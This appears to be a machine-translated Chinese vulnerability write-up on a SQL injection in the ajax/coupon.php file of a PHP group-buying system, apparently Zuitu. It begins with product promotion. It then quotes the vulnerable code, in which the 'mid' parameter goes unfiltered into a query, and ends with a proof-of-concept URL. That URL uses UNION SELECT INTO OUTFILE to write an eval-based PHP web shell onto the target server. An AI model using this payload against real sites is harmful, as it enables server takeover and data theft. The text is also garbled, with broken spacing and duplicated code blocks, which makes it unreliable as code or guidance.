The most popular groupbuy network blind injection n

The most popular groupbuy system is the most professional and powerful GroupOn free open-source groupbuy System Platform in China. It is a professional technical team, perfect user experience and excellent performance, based on providing users with the most reliable and Free Open Source online group buying system. From the technical perspective, this program uses the current popular PHP and MYSQL Database Development Technical Architecture in the software development IT industry. In terms of functions, the front-end homepage displays group buying items with a minimum number of groups for a service or product each day, with email subscriptions and invitations from friends, renren.com, kaixin.com, Sina Weibo, MSN/QQ share, send text messages, and purchase functions such as online printing and downloading of securities. The owner of the most popular group buying program has a management module, including humanized email sending parameter configuration, invitation and Rebate amount configuration, SMS interface configuration, and daily group buying project information management, quickly help customers with enthusiasm and aspirations to invest in the operation of group buying websites to establish their own group buying websites. In order to develop websites efficiently, the company has a set of systematic development principles, but it is not a static article that must be strictly observed. In special circumstances, it can be used flexibly and made some changes. The advantage of this is that the development process reduces the chance of errors and makes programming more efficient. It is conducive to the cooperation between developers and it is easier to find vulnerabilities in case of bugs. 0 × 0 most soil purchase blind injection n ajax/coupon. php <? Phprequire_once (dirname (_ FILE __)). '/app. php '); $ action = strval ($ _ GET ['action']); $ cid = strval ($ _ GET ['id']); $ sec = strval ($ _ GET ['secret']); ...... ....................... else if ($ action = 'mobile _ choice ') {$ oid = strval ($ _ GET ['mid']); $ order = Table :: fetch ('order', $ oid); $ user = Table: Fetch ('user', $ order ['user _ id']); $ mobile = $ order ['mobile']; if (! Utility: IsMobile ($ mobile) {$ mobile = $ user ['mobile'];} $ html = render ('ajax _ dialog_fillmobile '); json ($ html, 'Dialog ') ;}<? Phprequire_once (dirname (_ FILE __)). '/app. php '); $ action = strval ($ _ GET ['action']); $ cid = strval ($ _ GET ['id']); $ sec = strval ($ _ GET ['secret']); ...... ....................... else if ($ action = 'mobile _ choice ') {$ oid = strval ($ _ GET ['mid']); $ order = Table :: fetch ('order', $ oid); $ user = Table: Fetch ('user', $ order ['user _ id']); $ mobile = $ order ['mobile']; if (! Utility: IsMobile ($ mobile) {$ mobile = $ user ['mobile'];} $ html = render ('ajax _ dialog_fillmobile '); json ($ html, 'Dialog ');} when the action is mobile_choice, the mid parameter is passed in directly without any filtering, resulting in injection. To be honest, there is a function in the code that is used for filtering. See:/app. php <? Phprequire_once (dirname (_ FILE __). '/include/application. php ');/* magic_quota_gpc */$ _ GET = magic_gpc ($ _ GET); $ _ POST = magic_gpc ($ _ POST ); $ _ COOKIE = magic_gpc ($ _ COOKIE); <? Phprequire_once (dirname (_ FILE __). '/include/application. php ');/* magic_quota_gpc */$ _ GET = magic_gpc ($ _ GET); $ _ POST = magic_gpc ($ _ POST ); $ _ COOKIE = magic_gpc ($ _ COOKIE); you can see magic_gpc (). Then you can see how this function achieves function magic_gpc ($ string) {if (SYS_MAGICGPC) {if (is_array ($ string) {foreach ($ string as $ key => $ val) {$ string [$ key] = magic_gpc ($ val );}} else {$ string = stripslashes ($ string) ;}return $ string;} functio N magic_gpc ($ string) {if (SYS_MAGICGPC) {if (is_array ($ string) {foreach ($ string as $ key => $ val) {$ string [$ key] = magic_gpc ($ val) ;}} else {$ string = stripslashes ($ string) ;}} www.2cto. comreturn $ string;} If SYS_MAGICGPC is set to 1, each element of stripeslashes is used. If no element exists, nothing is done. However, SYS_MAGICGPC is set to 1 only when gpc is enabled. Is this filter? I don't know. I want to know how to develop a popular science program. In short, such code is full of loopholes, such as SQL injection should be a catch. Privilege when used for recreation 0 × 1 PoC welcome Test http://target.com/ajax/coupon.php?action=mobile_choice&mid=1 ')/**/And/**/1 = 2/**/union/**/select/**/1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 22%, % 3C? Php % 22, % 22 @ eval ($ _ POST ['ztz ']);? % 3E % 22/**/into/**/outfile/**/% 22c: \ xxx \ zuitu. php % 22; % 23